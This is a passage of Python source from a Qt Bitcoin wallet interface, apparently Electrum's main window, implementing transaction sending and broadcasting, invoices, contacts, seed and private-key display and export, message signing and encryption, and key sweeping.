run_hook('abort_send', self): return outputs, fee_estimator, tx_desc, coins = self.read_send_tab() if self.check_send_tab_outputs_and_show_errors(outputs): return try: is_sweep = bool(self.tx_external_keypairs) tx = self.wallet.make_unsigned_transaction( coins, outputs, self.config, fixed_fee=fee_estimator, is_sweep=is_sweep) except (NotEnoughFunds, NoDynamicFeeEstimates) as e: self.show_message(str(e)) return except InternalAddressCorruption as e: self.show_error(str(e)) raise except BaseException as e: self.logger.exception('') self.show_message(str(e)) return amount = tx.output_value() if self.max_button.isChecked() else sum(map(lambda x:x[2], outputs)) fee = tx.get_fee() use_rbf = self.config.get('use_rbf', True) if use_rbf: tx.set_rbf(True) if fee < 
self.wallet.relayfee() * tx.estimated_size() / 1000: self.show_error('\n'.join([ _("This transaction requires a higher fee, or it will not be propagated by your current server"), _("Try to raise your transaction fee, or use a server with a lower relay fee.") ])) return if preview: self.show_transaction(tx, tx_desc) return if not self.network: self.show_error(_("You can't broadcast a transaction without a live network connection.")) return # confirmation dialog msg = [ _("Amount to be sent") + ": " + self.format_amount_and_units(amount), _("Mining fee") + ": " + self.format_amount_and_units(fee), ] x_fee = run_hook('get_tx_extra_fee', self.wallet, tx) if x_fee: x_fee_address, x_fee_amount = x_fee msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) ) feerate_warning = simple_config.FEERATE_WARNING_HIGH_FEE if fee > feerate_warning * tx.estimated_size() / 1000: msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high.")) if self.wallet.has_keystore_encryption(): msg.append("") msg.append(_("Enter your password to proceed")) password = self.password_dialog('\n'.join(msg)) if not password: return else: msg.append(_('Proceed?')) password = None if not self.question('\n'.join(msg)): return def sign_done(success): if success: if not tx.is_complete(): self.show_transaction(tx) self.do_clear() else: self.broadcast_transaction(tx, tx_desc) self.sign_tx_with_password(tx, sign_done, password) @protected def sign_tx(self, tx, callback, password): self.sign_tx_with_password(tx, callback, password) def sign_tx_with_password(self, tx, callback, password): '''Sign the transaction in a separate thread. When done, calls the callback with a success code of True or False. ''' def on_success(result): callback(True) def on_failure(exc_info): self.on_error(exc_info) callback(False) on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success if self.tx_external_keypairs: # can sign directly task = partial(Transaction.sign, tx, self.tx_external_keypairs) else: task = partial(self.wallet.sign_transaction, tx, password) msg = _('Signing transaction...') WaitingDialog(self, msg, task, on_success, on_failure) def broadcast_transaction(self, tx, tx_desc): def broadcast_thread(): # non-GUI thread pr = self.payment_request if pr and pr.has_expired(): self.payment_request = None return False, _("Payment request has expired") status = False try: self.network.run_from_another_thread(self.network.broadcast_transaction(tx)) except TxBroadcastError as e: msg = e.get_message_for_gui() except BestEffortRequestFailed as e: msg = repr(e) else: status, msg = True, tx.txid() if pr and status is True: self.invoices.set_paid(pr, tx.txid()) self.invoices.save() self.payment_request = None refund_address = self.wallet.get_receiving_address() coro = pr.send_payment_and_receive_paymentack(str(tx), refund_address) fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop) ack_status, ack_msg = fut.result(timeout=20) self.logger.info(f"Payment ACK: {ack_status}. 
Ack message: {ack_msg}") return status, msg # Capture current TL window; override might be removed on return parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin)) def broadcast_done(result): # GUI thread if result: status, msg = result if status: if tx_desc is not None and tx.is_complete(): self.wallet.set_label(tx.txid(), tx_desc) parent.show_message(_('Payment sent.') + '\n' + msg) self.invoice_list.update() self.do_clear() else: msg = msg or '' parent.show_error(msg) WaitingDialog(self, _('Broadcasting transaction...'), broadcast_thread, broadcast_done, self.on_error) def query_choice(self, msg, choices): # Needed by QtHandler for hardware wallets dialog = WindowModalDialog(self.top_level_window()) clayout = ChoicesLayout(msg, choices) vbox = QVBoxLayout(dialog) vbox.addLayout(clayout.layout()) vbox.addLayout(Buttons(OkButton(dialog))) if not dialog.exec_(): return None return clayout.selected_index() def lock_amount(self, b): self.amount_e.setFrozen(b) self.max_button.setEnabled(not b) def prepare_for_payment_request(self): self.show_send_tab() self.payto_e.is_pr = True for e in [self.payto_e, self.message_e]: e.setFrozen(True) self.lock_amount(True) self.payto_e.setText(_("please wait...")) return True def delete_invoice(self, key): self.invoices.remove(key) self.invoice_list.update() def payment_request_ok(self): pr = self.payment_request if not pr: return key = self.invoices.add(pr) status = self.invoices.get_status(key) self.invoice_list.update() if status == PR_PAID: self.show_message("invoice already paid") self.do_clear() self.payment_request = None return self.payto_e.is_pr = True if not pr.has_expired(): self.payto_e.setGreen() else: self.payto_e.setExpired() self.payto_e.setText(pr.get_requestor()) self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point)) self.message_e.setText(pr.get_memo()) # signal to set fee self.amount_e.textEdited.emit("") def payment_request_error(self): pr = self.payment_request if not pr: return self.show_message(pr.error) self.payment_request = None self.do_clear() def on_pr(self, request): self.payment_request = request if self.payment_request.verify(self.contacts): self.payment_request_ok_signal.emit() else: self.payment_request_error_signal.emit() def pay_to_URI(self, URI): if not URI: return try: out = util.parse_URI(URI, self.on_pr) except InvalidBitcoinURI as e: self.show_error(_("Error parsing URI") + f":\n{e}") return self.show_send_tab() r = out.get('r') sig = out.get('sig') name = out.get('name') if r or (name and sig): self.prepare_for_payment_request() return address = out.get('address') amount = out.get('amount') label = out.get('label') message = out.get('message') # use label as description (not BIP21 compliant) if label and not message: message = label if address: self.payto_e.setText(address) if message: self.message_e.setText(message) if amount: self.amount_e.setAmount(amount) self.amount_e.textEdited.emit("") def do_clear(self): self.max_button.setChecked(False) self.not_enough_funds = False self.payment_request = None self.payto_e.is_pr = False for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e, self.fee_e, self.feerate_e]: e.setText('') e.setFrozen(False) self.fee_slider.activate() self.feerate_e.setAmount(self.config.fee_per_byte()) self.size_e.setAmount(0) self.feerounding_icon.setVisible(False) self.set_pay_from([]) self.tx_external_keypairs = {} self.update_status() run_hook('do_clear', self) def set_frozen_state_of_addresses(self, addrs, freeze: bool): 
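        """Freeze or unfreeze the given addresses.

        Editor's note (hedged summary of the body below): the state change is
        delegated to the wallet, the address and UTXO views are refreshed, and
        the fee is recomputed, since frozen coins are excluded when selecting
        spendable coins for the send tab.
        """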
self.wallet.set_frozen_state_of_addresses(addrs, freeze) self.address_list.update() self.utxo_list.update() self.update_fee() def set_frozen_state_of_coins(self, utxos, freeze: bool): self.wallet.set_frozen_state_of_coins(utxos, freeze) self.utxo_list.update() self.update_fee() def create_list_tab(self, l, toolbar=None): w = QWidget() w.searchable_list = l vbox = QVBoxLayout() w.setLayout(vbox) vbox.setContentsMargins(0, 0, 0, 0) vbox.setSpacing(0) if toolbar: vbox.addLayout(toolbar) vbox.addWidget(l) return w def create_addresses_tab(self): from .address_list import AddressList self.address_list = l = AddressList(self) toolbar = l.create_toolbar(self.config) toolbar_shown = self.config.get('show_toolbar_addresses', False) l.show_toolbar(toolbar_shown) return self.create_list_tab(l, toolbar) def create_utxo_tab(self): from .utxo_list import UTXOList self.utxo_list = l = UTXOList(self) return self.create_list_tab(l) def create_contacts_tab(self): from .contact_list import ContactList self.contact_list = l = ContactList(self) return self.create_list_tab(l) def remove_address(self, addr): if self.question(_("Do you want to remove {} from your wallet?").format(addr)): self.wallet.delete_address(addr) self.need_update.set() # history, addresses, coins self.clear_receive_tab() def get_coins(self): if self.pay_from: return self.pay_from else: return self.wallet.get_spendable_coins(None, self.config) def spend_coins(self, coins): self.set_pay_from(coins) self.show_send_tab() self.update_fee() def paytomany(self): self.show_send_tab() self.payto_e.paytomany() msg = '\n'.join([ _('Enter a list of outputs in the \'Pay to\' field.'), _('One output per line.'), _('Format: address, amount'), _('You may load a CSV file using the file icon.') ]) self.show_message(msg, title=_('Pay to many')) def payto_contacts(self, labels): paytos = [self.get_contact_payto(label) for label in labels] self.show_send_tab() if len(paytos) == 1: self.payto_e.setText(paytos[0]) self.amount_e.setFocus() else: text = "\n".join([payto + ", 0" for payto in paytos]) self.payto_e.setText(text) self.payto_e.setFocus() def set_contact(self, label, address): if not is_address(address): self.show_error(_('Invalid Address')) self.contact_list.update() # Displays original unchanged value return False self.contacts[address] = ('address', label) self.contact_list.update() self.history_list.update() self.update_completions() return True def delete_contacts(self, labels): if not self.question(_("Remove {} from your list of contacts?") .format(" + ".join(labels))): return for label in labels: self.contacts.pop(label) self.history_list.update() self.contact_list.update() self.update_completions() def show_invoice(self, key): pr = self.invoices.get(key) if pr is None: self.show_error('Cannot find payment request in wallet.') return pr.verify(self.contacts) self.show_pr_details(pr) def show_pr_details(self, pr): key = pr.get_id() d = WindowModalDialog(self, _("Invoice")) vbox = QVBoxLayout(d) grid = QGridLayout() grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0) grid.addWidget(QLabel(pr.get_requestor()), 0, 1) grid.addWidget(QLabel(_("Amount") + ':'), 1, 0) outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs())) grid.addWidget(QLabel(outputs_str), 1, 1) expires = pr.get_expiration_date() grid.addWidget(QLabel(_("Memo") + ':'), 2, 0) grid.addWidget(QLabel(pr.get_memo()), 2, 1) grid.addWidget(QLabel(_("Signature") + ':'), 3, 0) grid.addWidget(QLabel(pr.get_verify_status()), 3, 1) if 
expires: grid.addWidget(QLabel(_("Expires") + ':'), 4, 0) grid.addWidget(QLabel(format_time(expires)), 4, 1) vbox.addLayout(grid) def do_export(): name = str(key) + '.bip70' fn = self.getSaveFileName(_("Save invoice to file"), name, filter="*.bip70") if not fn: return with open(fn, 'wb') as f: data = f.write(pr.raw) self.show_message(_('Invoice saved as' + ' ' + fn)) exportButton = EnterButton(_('Save'), do_export) def do_delete(): if self.question(_('Delete invoice?')): self.invoices.remove(key) self.history_list.update() self.invoice_list.update() d.close() deleteButton = EnterButton(_('Delete'), do_delete) vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d))) d.exec_() def do_pay_invoice(self, key): pr = self.invoices.get(key) self.payment_request = pr self.prepare_for_payment_request() pr.error = None # this forces verify() to re-run if pr.verify(self.contacts): self.payment_request_ok() else: self.payment_request_error() def create_console_tab(self): from .console import Console self.console = console = Console() return console def update_console(self): console = self.console console.history = self.config.get("console-history",[]) console.history_index = len(console.history) console.updateNamespace({ 'wallet': self.wallet, 'network': self.network, 'plugins': self.gui_object.plugins, 'window': self, 'config': self.config, 'electrum': electrum, 'daemon': self.gui_object.daemon, 'util': util, 'bitcoin': bitcoin, }) c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True)) methods = {} def mkfunc(f, method): return lambda *args: f(method, args, self.password_dialog) for m in dir(c): if m[0]=='_' or m in ['network','wallet','config']: continue methods[m] = mkfunc(c._run, m) console.updateNamespace(methods) def create_status_bar(self): sb = QStatusBar() sb.setFixedHeight(35) self.balance_label = QLabel("Loading wallet...") self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse) self.balance_label.setStyleSheet("""QLabel { padding: 0 }""") sb.addWidget(self.balance_label) self.search_box = QLineEdit() self.search_box.textChanged.connect(self.do_search) self.search_box.hide() sb.addPermanentWidget(self.search_box) self.update_check_button = QPushButton("") self.update_check_button.setFlat(True) self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor)) self.update_check_button.setIcon(read_QIcon("update.png")) self.update_check_button.hide() sb.addPermanentWidget(self.update_check_button) self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog ) sb.addPermanentWidget(self.password_button) sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) ) self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog ) sb.addPermanentWidget(self.seed_button) self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self)) sb.addPermanentWidget(self.status_button) run_hook('create_status_bar', sb) self.setStatusBar(sb) def update_lock_icon(self): icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png") self.password_button.setIcon(icon) def update_buttons_on_seed(self): self.seed_button.setVisible(self.wallet.has_seed()) self.password_button.setVisible(self.wallet.may_have_password()) self.send_button.setVisible(not self.wallet.is_watching_only()) def change_password_dialog(self): from electrum.storage 
import STO_EV_XPUB_PW if self.wallet.get_available_storage_encryption_version() == STO_EV_XPUB_PW: from .password_dialog import ChangePasswordDialogForHW d = ChangePasswordDialogForHW(self, self.wallet) ok, encrypt_file = d.run() if not ok: return try: hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption() except UserCancelled: return except BaseException as e: self.logger.exception('') self.show_error(str(e)) return old_password = hw_dev_pw if self.wallet.has_password() else None new_password = hw_dev_pw if encrypt_file else None else: from .password_dialog import ChangePasswordDialogForSW d = ChangePasswordDialogForSW(self, self.wallet) ok, old_password, new_password, encrypt_file = d.run() if not ok: return try: self.wallet.update_password(old_password, new_password, encrypt_file) except InvalidPassword as e: self.show_error(str(e)) return except BaseException: self.logger.exception('Failed to update password') self.show_error(_('Failed to update password')) return msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected') self.show_message(msg, title=_("Success")) self.update_lock_icon() def toggle_search(self): tab = self.tabs.currentWidget() #if hasattr(tab, 'searchable_list'): # tab.searchable_list.toggle_toolbar() #return self.search_box.setHidden(not self.search_box.isHidden()) if not self.search_box.isHidden(): self.search_box.setFocus(1) else: self.do_search('') def do_search(self, t): tab = self.tabs.currentWidget() if hasattr(tab, 'searchable_list'): tab.searchable_list.filter(t) def new_contact_dialog(self): d = WindowModalDialog(self, _("New Contact")) vbox = QVBoxLayout(d) vbox.addWidget(QLabel(_('New Contact') + ':')) grid = QGridLayout() line1 = QLineEdit() line1.setFixedWidth(280) line2 = QLineEdit() line2.setFixedWidth(280) grid.addWidget(QLabel(_("Address")), 1, 0) grid.addWidget(line1, 1, 1) grid.addWidget(QLabel(_("Name")), 2, 0) grid.addWidget(line2, 2, 1) vbox.addLayout(grid) vbox.addLayout(Buttons(CancelButton(d), OkButton(d))) if d.exec_(): self.set_contact(line2.text(), line1.text()) def show_master_public_keys(self): dialog = WindowModalDialog(self, _("Wallet Information")) dialog.setMinimumSize(500, 100) mpk_list = self.wallet.get_master_public_keys() vbox = QVBoxLayout() wallet_type = self.wallet.storage.get('wallet_type', '') if self.wallet.is_watching_only(): wallet_type += ' [{}]'.format(_('watching-only')) seed_available = _('True') if self.wallet.has_seed() else _('False') keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()] grid = QGridLayout() basename = os.path.basename(self.wallet.storage.path) grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0) grid.addWidget(QLabel(basename), 0, 1) grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0) grid.addWidget(QLabel(wallet_type), 1, 1) grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0) grid.addWidget(QLabel(self.wallet.txin_type), 2, 1) grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0) grid.addWidget(QLabel(str(seed_available)), 3, 1) if len(keystore_types) <= 1: grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0) ks_type = str(keystore_types[0]) if keystore_types else _('No keystore') grid.addWidget(QLabel(ks_type), 4, 1) vbox.addLayout(grid) if self.wallet.is_deterministic(): mpk_text = ShowQRTextEdit() mpk_text.setMaximumHeight(150) mpk_text.addCopyButton(self.app) def show_mpk(index): mpk_text.setText(mpk_list[index]) # only show the combobox in case multiple accounts are available if 
len(mpk_list) > 1: def label(key): if isinstance(self.wallet, Multisig_Wallet): return _("cosigner") + f' {key+1} ( keystore: {keystore_types[key]} )' return '' labels = [label(i) for i in range(len(mpk_list))] on_click = lambda clayout: show_mpk(clayout.selected_index()) labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click) vbox.addLayout(labels_clayout.layout()) else: vbox.addWidget(QLabel(_("Master Public Key"))) show_mpk(0) vbox.addWidget(mpk_text) vbox.addStretch(1) vbox.addLayout(Buttons(CloseButton(dialog))) dialog.setLayout(vbox) dialog.exec_() def remove_wallet(self): if self.question('\n'.join([ _('Delete wallet file?'), "%s"%self.wallet.storage.path, _('If your wallet contains funds, make sure you have saved its seed.')])): self._delete_wallet() @protected def _delete_wallet(self, password): wallet_path = self.wallet.storage.path basename = os.path.basename(wallet_path) r = self.gui_object.daemon.delete_wallet(wallet_path) self.close() if r: self.show_error(_("Wallet removed: {}").format(basename)) else: self.show_error(_("Wallet file not found: {}").format(basename)) @protected def show_seed_dialog(self, password): if not self.wallet.has_seed(): self.show_message(_('This wallet has no seed')) return keystore = self.wallet.get_keystore() try: seed = keystore.get_seed(password) passphrase = keystore.get_passphrase(password) except BaseException as e: self.show_error(str(e)) return from .seed_dialog import SeedDialog d = SeedDialog(self, seed, passphrase) d.exec_() def show_qrcode(self, data, title = _("QR code"), parent=None): if not data: return d = QRDialog(data, parent or self, title) d.exec_() @protected def show_private_key(self, address, password): if not address: return try: pk, redeem_script = self.wallet.export_private_key(address, password) except Exception as e: self.logger.exception('') self.show_message(str(e)) return xtype = bitcoin.deserialize_privkey(pk)[0] d = WindowModalDialog(self, _("Private key")) d.setMinimumSize(600, 150) vbox = QVBoxLayout() vbox.addWidget(QLabel(_("Address") + ': ' + address)) vbox.addWidget(QLabel(_("Script type") + ': ' + xtype)) vbox.addWidget(QLabel(_("Private key") + ':')) keys_e = ShowQRTextEdit(text=pk) keys_e.addCopyButton(self.app) vbox.addWidget(keys_e) if redeem_script: vbox.addWidget(QLabel(_("Redeem Script") + ':')) rds_e = ShowQRTextEdit(text=redeem_script) rds_e.addCopyButton(self.app) vbox.addWidget(rds_e) vbox.addLayout(Buttons(CloseButton(d))) d.setLayout(vbox) d.exec_() msg_sign = _("Signing with an address actually means signing with the corresponding " "private key, and verifying with the corresponding public key. The " "address you have entered does not have a unique public key, so these " "operations cannot be performed.") + '\n\n' + \ _('The operation is undefined. 
Not just in Electrum, but in general.') @protected def do_sign(self, address, message, signature, password): address = address.text().strip() message = message.toPlainText().strip() if not bitcoin.is_address(address): self.show_message(_('Invalid Bitcoin address.')) return if self.wallet.is_watching_only(): self.show_message(_('This is a watching-only wallet.')) return if not self.wallet.is_mine(address): self.show_message(_('Address not in wallet.')) return txin_type = self.wallet.get_txin_type(address) if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']: self.show_message(_('Cannot sign messages with this type of address:') + \ ' ' + txin_type + '\n\n' + self.msg_sign) return task = partial(self.wallet.sign_message, address, message, password) def show_signed_message(sig): try: signature.setText(base64.b64encode(sig).decode('ascii')) except RuntimeError: # (signature) wrapped C/C++ object has been deleted pass self.wallet.thread.add(task, on_success=show_signed_message) def do_verify(self, address, message, signature): address = address.text().strip() message = message.toPlainText().strip().encode('utf-8') if not bitcoin.is_address(address): self.show_message(_('Invalid Bitcoin address.')) return try: # This can throw on invalid base64 sig = base64.b64decode(str(signature.toPlainText())) verified = ecc.verify_message_with_address(address, sig, message) except Exception as e: verified = False if verified: self.show_message(_("Signature verified")) else: self.show_error(_("Wrong signature")) def sign_verify_message(self, address=''): d = WindowModalDialog(self, _('Sign/verify Message')) d.setMinimumSize(610, 290) layout = QGridLayout(d) message_e = QTextEdit() message_e.setAcceptRichText(False) layout.addWidget(QLabel(_('Message')), 1, 0) layout.addWidget(message_e, 1, 1) layout.setRowStretch(2,3) address_e = QLineEdit() address_e.setText(address) layout.addWidget(QLabel(_('Address')), 2, 0) layout.addWidget(address_e, 2, 1) signature_e = QTextEdit() signature_e.setAcceptRichText(False) layout.addWidget(QLabel(_('Signature')), 3, 0) layout.addWidget(signature_e, 3, 1) layout.setRowStretch(3,1) hbox = QHBoxLayout() b = QPushButton(_("Sign")) b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e)) hbox.addWidget(b) b = QPushButton(_("Verify")) b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e)) hbox.addWidget(b) b = QPushButton(_("Close")) b.clicked.connect(d.accept) hbox.addWidget(b) layout.addLayout(hbox, 4, 1) d.exec_() @protected def do_decrypt(self, message_e, pubkey_e, encrypted_e, password): if self.wallet.is_watching_only(): self.show_message(_('This is a watching-only wallet.')) return cyphertext = encrypted_e.toPlainText() task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password) def setText(text): try: message_e.setText(text.decode('utf-8')) except RuntimeError: # (message_e) wrapped C/C++ object has been deleted pass self.wallet.thread.add(task, on_success=setText) def do_encrypt(self, message_e, pubkey_e, encrypted_e): message = message_e.toPlainText() message = message.encode('utf-8') try: public_key = ecc.ECPubkey(bfh(pubkey_e.text())) except BaseException as e: self.logger.exception('Invalid Public key') self.show_warning(_('Invalid Public key')) return encrypted = public_key.encrypt_message(message) encrypted_e.setText(encrypted.decode('ascii')) def encrypt_message(self, address=''): d = WindowModalDialog(self, _('Encrypt/decrypt Message')) d.setMinimumSize(610, 490) layout = QGridLayout(d) message_e = 
QTextEdit() message_e.setAcceptRichText(False) layout.addWidget(QLabel(_('Message')), 1, 0) layout.addWidget(message_e, 1, 1) layout.setRowStretch(2,3) pubkey_e = QLineEdit() if address: pubkey = self.wallet.get_public_key(address) pubkey_e.setText(pubkey) layout.addWidget(QLabel(_('Public key')), 2, 0) layout.addWidget(pubkey_e, 2, 1) encrypted_e = QTextEdit() encrypted_e.setAcceptRichText(False) layout.addWidget(QLabel(_('Encrypted')), 3, 0) layout.addWidget(encrypted_e, 3, 1) layout.setRowStretch(3,1) hbox = QHBoxLayout() b = QPushButton(_("Encrypt")) b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e)) hbox.addWidget(b) b = QPushButton(_("Decrypt")) b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e)) hbox.addWidget(b) b = QPushButton(_("Close")) b.clicked.connect(d.accept) hbox.addWidget(b) layout.addLayout(hbox, 4, 1) d.exec_() def password_dialog(self, msg=None, parent=None): from .password_dialog import PasswordDialog parent = parent or self d = PasswordDialog(parent, msg) return d.run() def tx_from_text(self, txt): from electrum.transaction import tx_from_str try: tx = tx_from_str(txt) return Transaction(tx) except BaseException as e: self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + str(e)) return def read_tx_from_qrcode(self): from electrum import qrscanner try: data = qrscanner.scan_barcode(self.config.get_video_device()) except BaseException as e: self.show_error(str(e)) return if not data: return # if the user scanned a bitcoin URI if str(data).startswith("bitcoin:"): self.pay_to_URI(data) return # else if the user scanned an offline signed tx try: data = bh2u(bitcoin.base_decode(data, length=None, base=43)) except BaseException as e: self.show_error((_('Could not decode QR code')+':\n{}').format(repr(e))) return tx = self.tx_from_text(data) if not tx: return self.show_transaction(tx) def read_tx_from_file(self): fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn") if not fileName: return try: with open(fileName, "r") as f: file_content = f.read() except (ValueError, IOError, os.error) as reason: self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found")) return return self.tx_from_text(file_content) def do_process_from_text(self): text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction")) if not text: return tx = self.tx_from_text(text) if tx: self.show_transaction(tx) def do_process_from_file(self): tx = self.read_tx_from_file() if tx: self.show_transaction(tx) def do_process_from_txid(self): from electrum import transaction txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':') if ok and txid: txid = str(txid).strip() try: raw_tx = self.network.run_from_another_thread( self.network.get_transaction(txid, timeout=10)) except Exception as e: self.show_message(_("Error getting transaction from network") + ":\n" + str(e)) return tx = transaction.Transaction(raw_tx) self.show_transaction(tx) @protected def export_privkeys_dialog(self, password): if self.wallet.is_watching_only(): self.show_message(_("This is a watching-only wallet")) return if isinstance(self.wallet, Multisig_Wallet): self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' + _('It cannot be "backed up" by simply exporting these private keys.')) d = WindowModalDialog(self, _('Private keys')) d.setMinimumSize(980, 300) vbox = 
QVBoxLayout(d) msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."), _("Exposing a single private key can compromise your entire wallet!"), _("In particular, DO NOT use 'redeem private key' services proposed by third parties.")) vbox.addWidget(QLabel(msg)) e = QTextEdit() e.setReadOnly(True) vbox.addWidget(e) defaultname = 'electrum-private-keys.csv' select_msg = _('Select file to export your private keys to') hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg) vbox.addLayout(hbox) b = OkButton(d, _('Export')) b.setEnabled(False) vbox.addLayout(Buttons(CancelButton(d), b)) private_keys = {} addresses = self.wallet.get_addresses() done = False cancelled = False def privkeys_thread(): for addr in addresses: time.sleep(0.1) if done or cancelled: break privkey = self.wallet.export_private_key(addr, password)[0] private_keys[addr] = privkey self.computing_privkeys_signal.emit() if not cancelled: self.computing_privkeys_signal.disconnect() self.show_privkeys_signal.emit() def show_privkeys(): s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items())) e.setText(s) b.setEnabled(True) self.show_privkeys_signal.disconnect() nonlocal done done = True def on_dialog_closed(*args): nonlocal done nonlocal cancelled if not done: cancelled = True self.computing_privkeys_signal.disconnect() self.show_privkeys_signal.disconnect() self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses)))) self.show_privkeys_signal.connect(show_privkeys) d.finished.connect(on_dialog_closed) threading.Thread(target=privkeys_thread).start() if not d.exec_(): done = True return filename = filename_e.text() if not filename: return try: self.do_export_privkeys(filename, private_keys, csv_button.isChecked()) except (IOError, os.error) as reason: txt = "\n".join([ _("Electrum was unable to produce a private key-export."), str(reason) ]) self.show_critical(txt, title=_("Unable to create csv")) except Exception as e: self.show_message(str(e)) return self.show_message(_("Private keys exported.")) def do_export_privkeys(self, fileName, pklist, is_csv): with open(fileName, "w+") as f: if is_csv: transaction = csv.writer(f) transaction.writerow(["address", "private_key"]) for addr, pk in pklist.items(): transaction.writerow(["%34s"%addr,pk]) else: f.write(json.dumps(pklist, indent = 4)) def do_import_labels(self): def import_labels(path): def _validate(data): return data # TODO def import_labels_assign(data): for key, value in data.items(): self.wallet.set_label(key, value) import_meta(path, _validate, import_labels_assign) def on_import(): self.need_update.set() import_meta_gui(self, _('labels'), import_labels, on_import) def do_export_labels(self): def export_labels(filename): export_meta(self.wallet.labels, filename) export_meta_gui(self, _('labels'), export_labels) def sweep_key_dialog(self): d = WindowModalDialog(self, title=_('Sweep private keys')) d.setMinimumSize(600, 300) vbox = QVBoxLayout(d) hbox_top = QHBoxLayout() hbox_top.addWidget(QLabel(_("Enter private keys:"))) hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight) vbox.addLayout(hbox_top) keys_e = ScanQRTextEdit(allow_multi=True) keys_e.setTabChangesFocus(True) vbox.addWidget(keys_e) addresses = self.wallet.get_unused_addresses() if not addresses: try: addresses = self.wallet.get_receiving_addresses() except AttributeError: addresses = self.wallet.get_addresses() h, address_e = address_field(addresses) vbox.addLayout(h) 
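        # Editor's note: a hedged sketch of the sweep flow wired up below.
        # keystore.get_private_keys() and sweep_preparations() are the real
        # helpers this method calls; the shapes described here are inferred
        # from how their results are used:
        #
        #     privkeys = keystore.get_private_keys(text)        # parse WIF keys
        #     coins, keypairs = sweep_preparations(privkeys, network)
        #     # coins:    spendable UTXOs controlled by those keys
        #     # keypairs: pubkey-to-privkey map, kept in
        #     #           self.tx_external_keypairs so signing can happen
        #     #           outside the wallet's own keystore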
vbox.addStretch(1) button = OkButton(d, _('Sweep')) vbox.addLayout(Buttons(CancelButton(d), button)) button.setEnabled(False) def get_address(): addr = str(address_e.text()).strip() if bitcoin.is_address(addr): return addr def get_pk(*, raise_on_error=False): text = str(keys_e.toPlainText()) return keystore.get_private_keys(text, raise_on_error=raise_on_error) def on_edit(): valid_privkeys = False try: valid_privkeys = get_pk(raise_on_error=True) is not None except Exception as e: button.setToolTip(f'{_("Error")}: {str(e)}') else: button.setToolTip('') button.setEnabled(get_address() is not None and valid_privkeys) on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet()) keys_e.textChanged.connect(on_edit) address_e.textChanged.connect(on_edit) address_e.textChanged.connect(on_address) on_address(str(address_e.text())) if not d.exec_(): return # user pressed "sweep" addr = get_address() try: self.wallet.check_address(addr) except InternalAddressCorruption as e: self.show_error(str(e)) raise try: coins, keypairs = sweep_preparations(get_pk(), self.network) except Exception as e: # FIXME too broad... self.show_message(str(e)) return self.do_clear() self.tx_external_keypairs = keypairs self.spend_coins(coins) self.payto_e.setText(addr) self.spend_max() self.payto_e.setFrozen(True) self.amount_e.setFrozen(True) self.warn_if_watching_only() def _do_import(self, title, header_layout, func): text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True) if not text: return keys = str(text).split() good_inputs, bad_inputs = func(keys) if good_inputs: msg = '\n'.join(good_inputs[:10]) if len(good_inputs) > 10: msg += '\n...' self.show_message(_("The following addresses were added") + f' ({len(good_inputs)}):\n' + msg) if bad_inputs: msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10]) if len(bad_inputs) > 10: msg += '\n...' 
